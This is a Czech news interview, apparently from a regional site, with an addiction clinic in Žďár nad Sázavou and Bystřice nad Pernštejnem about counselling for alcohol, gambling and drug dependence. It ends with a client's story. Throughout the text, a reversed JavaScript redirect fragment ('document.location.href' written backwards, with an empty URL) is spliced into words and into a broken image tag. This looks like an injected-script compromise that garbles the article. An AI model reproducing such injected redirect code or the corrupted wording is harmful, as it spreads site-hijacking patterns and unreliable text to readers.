Rainbow page separator

Alkohol, cigarety, sázení: Říct si o pomoc není slabost!

Pondělí, 25. listopadu 2019

Co si pod Adik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologickou ambulancí vlastně představit?
Pojem „adik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologie“ se v Čechách začal výrazněji objevovat po roce 2000. Jedná se o obor zabývající se prevencí, léčbou a výzkumem užívání návykových látek a jiných forem závislostního chování. Přímo Adik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologická ambulance je službou pro všechny, kteří se potýkají se závislostí u sebe či blízkých.

S čím lidé do ambulance docházejí?
Do ambulance může přijít kdokoliv, kdo se potýká s nějakou závislostí. Někdo ví, že si dává víc skleniček alkoholu, než by asi měl. Jiného člověka už ohrožuje, že stále sází on-line na spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zápasy a musí si půjčovat za zády svých blízkých. Nebo máma od dvou kluků zjistí, že její děti mají opakovanou zkušenost s marihuanou. Anebo jde o situaci, kdy již ty člověk léky na utlumení bere stále a omezuje ho [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v běžném životě.

A jak dokážete lidem pomoci?
Nejčastější formou je individuální setkávání s terapeutem jednou týdně na 45 minut. Obsahem setkání je rozhovor nad tématy, která jsou pro klienta důležitá. Možností je také využít skupinové terapie, která probíhá každý týden v délce 90 minut. Ale je také možné přijít se jen poradit, informovat se o možnostech pomoci. To se týká hlavně blízkých osob těch, kteří mají nějakou obtíž.

Musí mít člověk nějaké doporučení?
Nemusí. Důležité je se objednat na telefonu 721 326 994, nebo e-mailu ambulance@kolping.cz. Poté proběhne příjmové setkání a následně již člověk může docházet k terapeu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovi nebo na skupinu. A [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve Žďáře nad Sázavou na Žižkově ulici č.p. 300 pod Kinem Vysočina nebo v Bystřici nad Pernštejnem v budově polikliniky. Vše důležité je na webu www.ambulance.kolping.cz.

Říkám si, že člověk s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obtíží může mít obavy někam docházet…
To máte určitě pravdu. Ze zkušeností však víme, že ti, co ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ostych překonali, na sobě udělali velký kus práce a žije se jim lépe.
Prostě jim [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to určitě stálo za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. A nejen pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že služba je bezplatná. Za což děkujeme Evropskému sociálnímu fondu, Kraji Vysočina, Radě vlády pro koordinaci protidrogové politiky a městům Žďár nad Sázavou a Bystřici nad Pernštejnem, kde působíme. Ti všichni nás finančně podporují.

Příběh klienta aneb [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se může stát komukoliv….
Milan byl ještě před několika lety úspěšný a vytížený muž. Ve svých 35 letech měl dobrou práci, ženu a dvě malé děti, bydleli ve vlastním domě. Jen se stresem se vypořádával pořád hůř a hůř. A tak přišla první sklenička, jenom na dobrou náladu. Zanedlouho jedna sklenička nestačila a v hospodské partě mu začalo být lépe než doma. Závislost se tak začala rozvíjet a začalo se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to projevovat v práci, ve vztazích, i na jeho zdraví. Milan si naštěstí díky své inteligenci a životním ambicím uvědomil, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sám nezvládne a vyhledal odbornou pomoc.


[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologicka-ambulance-kolping-zdar-nad-sazavou.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologicka-ambulance-kolping-zdar-nad-sazavou.jpg“ alt=““ width=“540″ height=“762″>